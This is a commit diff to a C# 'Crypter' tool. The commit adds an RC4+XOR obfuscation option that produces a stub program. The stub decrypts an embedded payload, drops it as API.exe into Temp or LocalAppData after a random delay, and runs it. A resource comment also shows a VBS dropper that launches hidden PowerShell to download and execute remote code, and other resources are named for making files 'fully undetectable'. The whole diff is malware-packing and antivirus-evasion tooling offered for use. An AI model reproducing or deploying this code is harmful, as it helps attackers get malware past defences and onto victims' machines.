add
This commit is contained in:
parent
5e369e0a2d
commit
71cd2f8f50
|
@ -53,7 +53,7 @@
|
|||
<Reference Include="DotNetZip, Version=1.13.7.0, Culture=neutral, PublicKeyToken=6583c7c814667745, processorArchitecture=MSIL">
|
||||
<HintPath>..\packages\DotNetZip.1.13.7\lib\net40\DotNetZip.dll</HintPath>
|
||||
<EmbedInteropTypes>False</EmbedInteropTypes>
|
||||
<Private>False</Private>
|
||||
<Private>True</Private>
|
||||
</Reference>
|
||||
<Reference Include="Microsoft.VisualBasic" />
|
||||
<Reference Include="System" />
|
||||
|
@ -138,6 +138,7 @@
|
|||
<Content Include="Resources\autoit_url.txt" />
|
||||
<Content Include="Resources\imgcrypt.txt" />
|
||||
<Content Include="Resources\CSharp_js_url.txt" />
|
||||
<Content Include="Resources\rc4_xor.txt" />
|
||||
<Content Include="Resources\VBS_img.txt" />
|
||||
<Content Include="Resources\VBS_url.txt" />
|
||||
<Content Include="Resources\VB.txt" />
|
||||
|
|
|
@ -69,6 +69,7 @@
|
|||
this.groupBox2 = new System.Windows.Forms.GroupBox();
|
||||
this.button18 = new System.Windows.Forms.Button();
|
||||
this.button17 = new System.Windows.Forms.Button();
|
||||
this.button19 = new System.Windows.Forms.Button();
|
||||
this.contextMenuStrip1.SuspendLayout();
|
||||
this.menuStrip1.SuspendLayout();
|
||||
this.groupBox1.SuspendLayout();
|
||||
|
@ -415,7 +416,7 @@
|
|||
this.groupBox2.Size = new System.Drawing.Size(126, 68);
|
||||
this.groupBox2.TabIndex = 27;
|
||||
this.groupBox2.TabStop = false;
|
||||
this.groupBox2.Text = "groupBox2";
|
||||
this.groupBox2.Text = "imgVBS";
|
||||
//
|
||||
// button18
|
||||
//
|
||||
|
@ -437,12 +438,23 @@
|
|||
this.button17.UseVisualStyleBackColor = true;
|
||||
this.button17.Click += new System.EventHandler(this.button17_Click);
|
||||
//
|
||||
// button19
|
||||
//
|
||||
this.button19.Location = new System.Drawing.Point(144, 308);
|
||||
this.button19.Name = "button19";
|
||||
this.button19.Size = new System.Drawing.Size(59, 38);
|
||||
this.button19.TabIndex = 28;
|
||||
this.button19.Text = "RC4\r\nXOR";
|
||||
this.button19.UseVisualStyleBackColor = true;
|
||||
this.button19.Click += new System.EventHandler(this.button19_Click);
|
||||
//
|
||||
// Form1
|
||||
//
|
||||
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
|
||||
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
|
||||
this.BackColor = System.Drawing.SystemColors.Control;
|
||||
this.ClientSize = new System.Drawing.Size(751, 383);
|
||||
this.Controls.Add(this.button19);
|
||||
this.Controls.Add(this.groupBox2);
|
||||
this.Controls.Add(this.button15);
|
||||
this.Controls.Add(this.groupBox1);
|
||||
|
@ -527,6 +539,7 @@
|
|||
private System.Windows.Forms.GroupBox groupBox2;
|
||||
private System.Windows.Forms.Button button18;
|
||||
private System.Windows.Forms.Button button17;
|
||||
private System.Windows.Forms.Button button19;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -11,6 +11,9 @@ using System.Diagnostics;
|
|||
using Ionic.Zip;
|
||||
using Crypter;
|
||||
using System.Drawing;
|
||||
using System.CodeDom.Compiler;
|
||||
using Microsoft.CSharp;
|
||||
using System.Collections.Generic;
|
||||
|
||||
namespace CrypterExample
|
||||
{
|
||||
|
@ -554,5 +557,98 @@ namespace CrypterExample
|
|||
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
|
||||
}
|
||||
}
|
||||
static string ByteArrayToString(byte[] ba)
|
||||
{
|
||||
return BitConverter.ToString(ba).Replace("-", "");
|
||||
}
|
||||
static byte[] RC4(byte[] pwd, byte[] data)
|
||||
{
|
||||
int a, i, j, k, tmp;
|
||||
int[] key, box;
|
||||
byte[] cipher;
|
||||
|
||||
key = new int[256];
|
||||
box = new int[256];
|
||||
cipher = new byte[data.Length];
|
||||
|
||||
for (i = 0; i < 256; i++)
|
||||
{
|
||||
key[i] = pwd[i % pwd.Length];
|
||||
box[i] = i;
|
||||
}
|
||||
for (j = i = 0; i < 256; i++)
|
||||
{
|
||||
j = (j + box[i] + key[i]) % 256;
|
||||
tmp = box[i];
|
||||
box[i] = box[j];
|
||||
box[j] = tmp;
|
||||
}
|
||||
for (a = j = i = 0; i < data.Length; i++)
|
||||
{
|
||||
a++;
|
||||
a %= 256;
|
||||
j += box[a];
|
||||
j %= 256;
|
||||
tmp = box[a];
|
||||
box[a] = box[j];
|
||||
box[j] = tmp;
|
||||
k = box[((box[a] + box[j]) % 256)];
|
||||
cipher[i] = (byte)(data[i] ^ k);
|
||||
}
|
||||
return cipher;
|
||||
}
|
||||
|
||||
static string XOR(string target)
|
||||
{
|
||||
string result = "";
|
||||
|
||||
for (int i = 0; i < target.Length; i++)
|
||||
{
|
||||
char ch = (char)(target[i] ^ 123);
|
||||
result += ch;
|
||||
}
|
||||
|
||||
//Console.WriteLine("XOR Encoded string: " + result);
|
||||
return result;
|
||||
}
|
||||
public static string CompressString(string value)
|
||||
{
|
||||
byte[] byteArray = new byte[0];
|
||||
if (!string.IsNullOrEmpty(value))
|
||||
{
|
||||
byteArray = Encoding.UTF8.GetBytes(value);
|
||||
using (MemoryStream stream = new MemoryStream())
|
||||
{
|
||||
using (GZipStream zip = new GZipStream(stream, CompressionMode.Compress))
|
||||
{
|
||||
zip.Write(byteArray, 0, byteArray.Length);
|
||||
}
|
||||
byteArray = stream.ToArray();
|
||||
}
|
||||
}
|
||||
return Convert.ToBase64String(byteArray);
|
||||
}
|
||||
|
||||
private void button19_Click(object sender, EventArgs e)
|
||||
{
|
||||
if (textBox1.Text != "" && textBox3.Text != "")
|
||||
{
|
||||
string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox3.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку
|
||||
|
||||
string Source = Crypter.Properties.Resources.rc4_xor; // Переменная, в которой хранится код стаба
|
||||
Source = Source.Replace("[BYTES]", CompressString(XOR(bytesString))); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
|
||||
Source = Source.Replace("[PASSWORD]", CompressString(textBox3.Text)); // Заменяем пароль для RC4
|
||||
textBox2.Text = Source;
|
||||
MessageBox.Show("Copy to VS ; Use .NET Framework 4 ; Choose Windows Application.",
|
||||
"Success!", MessageBoxButtons.OK, MessageBoxIcon.Information);
|
||||
}
|
||||
else
|
||||
{
|
||||
MessageBox.Show("Please select the file and enter the key.",
|
||||
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -404,6 +404,30 @@ namespace Crypter.Properties {
|
|||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// 查找类似 using System;
|
||||
///using System.Diagnostics;
|
||||
///using System.IO;
|
||||
///using System.Text;
|
||||
///using System.Threading;
|
||||
///using System.IO.Compression;
|
||||
///using System.Reflection;
|
||||
///
|
||||
///namespace StubEch
|
||||
///{
|
||||
/// class Program
|
||||
/// {
|
||||
/// static void Main(string[] args)
|
||||
/// {
|
||||
/// Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
|
||||
/// byte[] encryptedBytes = StringToByteArray(XOR(DecompressString("[BYTES]"))); // Сначала принимаем строку зашифрован [字符串的其余部分被截断]"; 的本地化字符串。
|
||||
/// </summary>
|
||||
internal static string rc4_xor {
|
||||
get {
|
||||
return ResourceManager.GetString("rc4_xor", resourceCulture);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// 查找类似 Module ReFUD
|
||||
/// Sub Main()
|
||||
|
@ -428,7 +452,26 @@ namespace Crypter.Properties {
|
|||
}
|
||||
|
||||
/// <summary>
|
||||
/// 查找类似 的本地化字符串。
|
||||
/// 查找类似 Dim Capony
|
||||
///Dim WshProcEnv
|
||||
///Dim process_architecture
|
||||
///
|
||||
///Set Capony = CreateObject("WScript.Shell")
|
||||
///Set WshProcEnv = Capony.Environment("Process")
|
||||
///
|
||||
///process_architecture= WshProcEnv("PROCESSOR_ARCHITECTURE")
|
||||
///
|
||||
///If process_architecture = "x86" Then
|
||||
/// attack("Powershell")
|
||||
///Else
|
||||
/// attack("C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe")
|
||||
///End If
|
||||
///
|
||||
///
|
||||
///
|
||||
///sub attack(S)
|
||||
///
|
||||
///Capony.Run S +" -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('123456')", CONSOLE_HIDE, CMD [字符串的其余部分被截断]"; 的本地化字符串。
|
||||
/// </summary>
|
||||
internal static string VBS_img {
|
||||
get {
|
||||
|
|
|
@ -163,6 +163,9 @@
|
|||
<data name="rc4" type="System.Resources.ResXFileRef, System.Windows.Forms">
|
||||
<value>..\resources\rc4.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
|
||||
</data>
|
||||
<data name="rc4_xor" type="System.Resources.ResXFileRef, System.Windows.Forms">
|
||||
<value>..\resources\rc4_xor.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
|
||||
</data>
|
||||
<data name="VB" type="System.Resources.ResXFileRef, System.Windows.Forms">
|
||||
<value>..\resources\vb.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;gb2312</value>
|
||||
</data>
|
||||
|
|
|
@ -0,0 +1,126 @@
|
|||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using System.Text;
|
||||
using System.Threading;
|
||||
using System.IO.Compression;
|
||||
using System.Reflection;
|
||||
|
||||
namespace StubEch
|
||||
{
|
||||
class Program
|
||||
{
|
||||
static void Main(string[] args)
|
||||
{
|
||||
Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
|
||||
byte[] encryptedBytes = StringToByteArray(XOR(DecompressString("[BYTES]"))); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
|
||||
byte[] passBytes = Encoding.Default.GetBytes(DecompressString("[PASSWORD]")); // Получаем байты пароля для RC4
|
||||
byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
|
||||
DAR(decryptedBytes, "API.exe"); // Дропаем и запускаем чистый файл
|
||||
}
|
||||
|
||||
static void DAR(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
|
||||
{
|
||||
string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
|
||||
{
|
||||
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
|
||||
Path.GetTempPath() // Temp
|
||||
};
|
||||
|
||||
Random random = new Random(); // Создаём переменную random, для генерации случайного числа
|
||||
int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно
|
||||
string filePath = dirs[pathIndex] + "\\" + fileName; // Переменная, в которой хранится полный путь до файла
|
||||
|
||||
try
|
||||
{
|
||||
if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
|
||||
{
|
||||
File.Delete(filePath); // Если файл существует, то удаляем его
|
||||
}
|
||||
|
||||
File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
|
||||
Process.Start(filePath); // Запускаем
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
|
||||
static byte[] StringToByteArray(string hex)
|
||||
{
|
||||
int NumberChars = hex.Length;
|
||||
byte[] bytes = new byte[NumberChars / 2];
|
||||
for (int i = 0; i < NumberChars; i += 2)
|
||||
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
|
||||
return bytes;
|
||||
}
|
||||
static string XOR(string target)
|
||||
{
|
||||
string result = "";
|
||||
|
||||
for (int i = 0; i < target.Length; i++)
|
||||
{
|
||||
char ch = (char)(target[i] ^ 123);
|
||||
result += ch;
|
||||
}
|
||||
|
||||
//Console.WriteLine("XOR Encoded string: " + result);
|
||||
return result;
|
||||
}
|
||||
public static string DecompressString(string str)
|
||||
{
|
||||
var value = Convert.FromBase64String(str);
|
||||
string resultString = string.Empty;
|
||||
if (value != null && value.Length > 0)
|
||||
{
|
||||
using (MemoryStream stream = new MemoryStream(value))
|
||||
using (GZipStream zip = new GZipStream(stream, CompressionMode.Decompress))
|
||||
using (StreamReader reader = new StreamReader(zip))
|
||||
{
|
||||
resultString = reader.ReadToEnd();
|
||||
}
|
||||
}
|
||||
return resultString;
|
||||
}
|
||||
static byte[] RC4(byte[] pwd, byte[] data)
|
||||
{
|
||||
int a, i, j, k, tmp;
|
||||
int[] key, box;
|
||||
byte[] cipher;
|
||||
|
||||
key = new int[256];
|
||||
box = new int[256];
|
||||
cipher = new byte[data.Length];
|
||||
|
||||
for (i = 0; i < 256; i++)
|
||||
{
|
||||
key[i] = pwd[i % pwd.Length];
|
||||
box[i] = i;
|
||||
}
|
||||
for (j = i = 0; i < 256; i++)
|
||||
{
|
||||
j = (j + box[i] + key[i]) % 256;
|
||||
tmp = box[i];
|
||||
box[i] = box[j];
|
||||
box[j] = tmp;
|
||||
}
|
||||
for (a = j = i = 0; i < data.Length; i++)
|
||||
{
|
||||
a++;
|
||||
a %= 256;
|
||||
j += box[a];
|
||||
j %= 256;
|
||||
tmp = box[a];
|
||||
box[a] = box[j];
|
||||
box[j] = tmp;
|
||||
k = box[((box[a] + box[j]) % 256)];
|
||||
cipher[i] = (byte)(data[i] ^ k);
|
||||
}
|
||||
return cipher;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
}
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue